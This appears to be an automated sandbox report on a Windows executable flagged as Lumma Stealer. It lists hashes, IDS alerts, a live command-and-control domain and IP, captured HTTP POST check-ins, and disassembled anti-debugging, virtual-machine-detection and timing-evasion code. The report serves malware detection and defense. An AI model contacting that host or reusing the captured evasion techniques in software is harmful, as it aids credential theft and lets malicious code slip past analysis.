Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561923
MD5: 542cd6ef81cdd42518ba3baf58eb90e6
SHA1: b8ddd7bd3eae36806335a2c215863853c6c424f4
SHA256: 23f4575b36961a3121fbec04b3e803e020e9dea411cce529a02e6eb658cc0f60
Tags: exe, user-Bitsight

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Suricata IDS alerts for network traffic
AI detected suspicious sample
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 3360 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 542CD6EF81CDD42518BA3BAF58EB90E6)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
Suricata IDS alerts:

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-24T20:01:19.775771+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49704 | 104.21.33.116 | 443 | TCP
2024-11-24T20:01:21.942911+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49705 | 104.21.33.116 | 443 | TCP
2024-11-24T20:01:20.801399+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49704 | 104.21.33.116 | 443 | TCP
2024-11-24T20:01:20.801399+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.8 | 49704 | 104.21.33.116 | 443 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov byte ptr [eax], bl (0_2_002FCF05)
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov ecx, eax (0_2_002FC02B)
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov byte ptr [ebx], al (0_2_00310870)
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then push eax (0_2_0032B860)
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 98D5A07Fh (0_2_0032C040)
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], C18BC4BAh (0_2_0032C040)
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 6DBC3610h (0_2_0032C040)
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 98D5A07Fh (0_2_0032C040)
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov edx, eax (0_2_0032B8E0)
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov edx, ecx (0_2_0032B8E0)
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+14h] (0_2_002F98F0)
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then push eax (0_2_0032F8D0)
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov edi, eax (0_2_0032F8D0)
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx eax, byte ptr [esp+esi+000001E8h] (0_2_002FE0D8)
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edi, byte ptr [esp+edx+14h] (0_2_002FE970)
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov word ptr [esi], cx (0_2_002FEA38)
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax-65h] (0_2_002FE35B)
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov byte ptr [esi], cl (0_2_00318CB0)
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov edx, ecx (0_2_002FBC9D)
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov eax, ebp (0_2_002F5C90)
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov eax, ebp (0_2_002F5C90)
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], 4C697C35h (0_2_0032BCE0)
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edx, byte ptr [eax+ecx] (0_2_002FAD00)
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edx, byte ptr [edi] (0_2_00315E90)
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-58FA0F6Ch] (0_2_00330F60)
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edx, byte ptr [eax+ecx+00008F12h] (0_2_002F77D0)
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov word ptr [ebp+ebx*4+00h], ax (0_2_002F77D0)

Networking

Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49704 -> 104.21.33.116:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49704 -> 104.21.33.116:443
Source: Joe Sandbox View | IP Address: 104.21.33.116
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49705 -> 104.21.33.116:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49704 -> 104.21.33.116:443
Source: global traffic | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 8
  Host: property-imper.sbs
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: property-imper.sbs
Source: unknown | HTTP traffic detected:
  POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 8
  Host: property-imper.sbs
Source: file.exe, 00000000.00000002.1496657784.0000000000F06000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1495270125.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://property-imper.sbs/
Source: file.exe, 00000000.00000003.1495487272.0000000000F12000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1495632957.0000000000F06000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1495559428.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1495270125.0000000000F06000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1496731344.0000000000F15000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1496657784.0000000000F06000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://property-imper.sbs/api
Source: file.exe, 00000000.00000002.1496527747.0000000000EEC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1495270125.0000000000EEC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://property-imper.sbs/apiC
Source: file.exe, 00000000.00000003.1495632957.0000000000F06000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1495270125.0000000000F06000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1496657784.0000000000F06000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://property-imper.sbs/apiM
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown | HTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.8:49704 version: TLS 1.2

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00329030
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002F89A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002FCF05
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00310870
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002F4040
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002F6840
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0032C040
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0032B8E0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002F98F0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0032F8D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002FE0D8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002FE970
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002F61A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004C5982
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003241D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004C09B2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002F9210
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002FB210
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002F4AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0030DB30
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0030FB60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0036D36F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002F2B80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004C241C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00318CB0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00330C80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004B54F3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002F5C90
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003224E0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002F6CC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002F94D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00309530
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004C7558
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002FAD00
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00313D70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0048BD2A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002F3580
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00331580
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003BF58C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00317E20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004B165E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00310650
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004B9EC6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00315E90
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004BEF5B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00318770
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003E876E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00330F60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003287B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00311790
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0032C780
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0041278D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004B0792
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002F27D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002F77D0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section:  ZLIB complexity 0.999327612704918
Source: file.exe | Static PE information: Section: euxtkkub ZLIB complexity 0.9940000281193762
Source: classification engine | Classification label: mal100.evad.winEXE@1/0@1/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003227B0 CoCreateInstance
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: file.exe | Static file information: File size 1878528 > 1048576
Source: file.exe | Static PE information: Raw size of euxtkkub is bigger than: 0x100000 < 0x1a0c00

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.2f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;euxtkkub:EW;ttmnjqdd:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;euxtkkub:EW;ttmnjqdd:EW;.taggant:EW;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1d8c83 should be: 0x1d6a49
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: euxtkkub
Source: file.exe | Static PE information: section name: ttmnjqdd
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00595859 push esi; mov dword ptr [esp], 4963FB10h (0_2_00595878)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00595859 push 32CBB7C8h; mov dword ptr [esp], ebx (0_2_005958EB)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00595859 push edi; mov dword ptr [esp], eax (0_2_00595910)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004FD85E push ecx; mov dword ptr [esp], esi (0_2_004FD8CD)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00308028 push esp; ret (0_2_0030802B)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005B0868 push ebx; mov dword ptr [esp], 1AD68EE0h (0_2_005B0872)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005B0868 push esi; mov dword ptr [esp], 502CB876h (0_2_005B09BE)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00596839 push 58DF42F3h; mov dword ptr [esp], esi (0_2_0059687D)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00305057 push eax; iretd (0_2_00305058)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005AC030 push 5BC44554h; mov dword ptr [esp], edx (0_2_005AC0A5)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004E803B push edx; mov dword ptr [esp], 2C8BAC70h (0_2_004E8083)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005590D4 push esi; mov dword ptr [esp], edi (0_2_00559112)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005808D6 push ebp; mov dword ptr [esp], eax (0_2_00580903)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004DF0E7 push 56689AA5h; mov dword ptr [esp], edi (0_2_004DF6ED)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005878E8 push ebp; mov dword ptr [esp], 6DCC9028h (0_2_0058791E)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005878E8 push ebx; mov dword ptr [esp], esi (0_2_0058793A)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005878E8 push 3AD7AF7Dh; mov dword ptr [esp], eax (0_2_00587961)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005780EF push edi; mov dword ptr [esp], esi (0_2_005784B5)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0058D095 push 1A52A2A6h; mov dword ptr [esp], esp (0_2_0058D0B8)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0058D095 push edi; mov dword ptr [esp], 0B2F15D6h (0_2_0058D0C3)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0058D095 push 76C03E25h; mov dword ptr [esp], edi (0_2_0058D182)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0058C8BC push 2039066Dh; mov dword ptr [esp], eax (0_2_0058C8CA)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004EE8A7 push eax; mov dword ptr [esp], 4FFB6DA6h (0_2_004EE8F2)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00541953 push 04FEEF4Bh; mov dword ptr [esp], ebx (0_2_00541992)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0052917F push 64EE862Bh; mov dword ptr [esp], ebx (0_2_00529D89)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0052917F push 66DA49E7h; mov dword ptr [esp], esp (0_2_00529D92)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0030811F push esp; iretd (0_2_00308135)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00308100 push esp; iretd (0_2_00308102)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F811B push 5AD60994h; mov dword ptr [esp], ecx (0_2_004F812C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F811B push 7BFE382Eh; mov dword ptr [esp], esp (0_2_004F8134)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005881C6 push 40335C28h; mov dword ptr [esp], eax (0_2_005881F0)
Source: file.exe | Static PE information: section name:  entropy: 7.982670548763517
Source: file.exe | Static PE information: section name: euxtkkub entropy: 7.953806103846816

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 34D3AF second address: 34CC51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F59556149A7h 0x00000009 popad 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D2786h], ecx 0x00000011 push dword ptr [ebp+122D13ADh] 0x00000017 cmc 0x00000018 call dword ptr [ebp+122D2729h] 0x0000001e pushad 0x0000001f cmc 0x00000020 xor eax, eax 0x00000022 jmp 00007F59556149A4h 0x00000027 mov edx, dword ptr [esp+28h] 0x0000002b pushad 0x0000002c add edx, dword ptr [ebp+122D37F9h] 0x00000032 mov si, ax 0x00000035 popad 0x00000036 mov dword ptr [ebp+122D3AF9h], eax 0x0000003c or dword ptr [ebp+122D21CCh], edi 0x00000042 mov esi, 0000003Ch 0x00000047 js 00007F595561499Ch 0x0000004d add esi, dword ptr [esp+24h] 0x00000051 pushad 0x00000052 mov bx, 3189h 0x00000056 mov dword ptr [ebp+122D21CCh], esi 0x0000005c popad 0x0000005d lodsw 0x0000005f cld 0x00000060 add eax, dword ptr [esp+24h] 0x00000064 pushad 0x00000065 pushad 0x00000066 add eax, 41EABC8Eh 0x0000006c mov dword ptr [ebp+122D21CCh], ebx 0x00000072 popad 0x00000073 call 00007F59556149A8h 0x00000078 mov esi, eax 0x0000007a pop edi 0x0000007b popad 0x0000007c mov ebx, dword ptr [esp+24h] 0x00000080 cld 0x00000081 nop 0x00000082 push edi 0x00000083 push eax 0x00000084 push edx 0x00000085 push eax 0x00000086 pop eax 0x00000087 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4BB457 second address: 4BB468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jl 00007F5954CE94A6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4BB468 second address: 4BB46C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4BB46C second address: 4BB472 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4BB472 second address: 4BB47E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F5955614996h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4BB47E second address: 4BB482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4BB482 second address: 4BB4B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F59556149A5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F595561499Ch 0x00000012 jc 00007F5955614996h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4CB575 second address: 4CB579 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4CB579 second address: 4CB57F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4CB57F second address: 4CB58B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4CB58B second address: 4CB58F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4CB58F second address: 4CB5AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5954CE94B5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4CB88B second address: 4CB895 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5955614996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4CB895 second address: 4CB89C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4CBB26 second address: 4CBB2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4CBB2B second address: 4CBB31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4CBB31 second address: 4CBB37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4CBB37 second address: 4CBB3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4CF068 second address: 4CF0E1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F595561499Ch 0x0000000c jnp 00007F5955614996h 0x00000012 popad 0x00000013 xor dword ptr [esp], 0D53EE8Bh 0x0000001a push edx 0x0000001b jl 00007F5955614998h 0x00000021 push edi 0x00000022 pop ecx 0x00000023 pop edx 0x00000024 adc dl, FFFFFFA1h 0x00000027 push 00000003h 0x00000029 push 00000000h 0x0000002b pushad 0x0000002c mov edi, dword ptr [ebp+122D3A11h] 0x00000032 add ch, 0000000Eh 0x00000035 popad 0x00000036 push 00000003h 0x00000038 push 00000000h 0x0000003a push esi 0x0000003b call 00007F5955614998h 0x00000040 pop esi 0x00000041 mov dword ptr [esp+04h], esi 0x00000045 add dword ptr [esp+04h], 00000014h 0x0000004d inc esi 0x0000004e push esi 0x0000004f ret 0x00000050 pop esi 0x00000051 ret 0x00000052 jno 00007F595561499Ch 0x00000058 call 00007F5955614999h 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007F595561499Dh 0x00000065 rdtsc
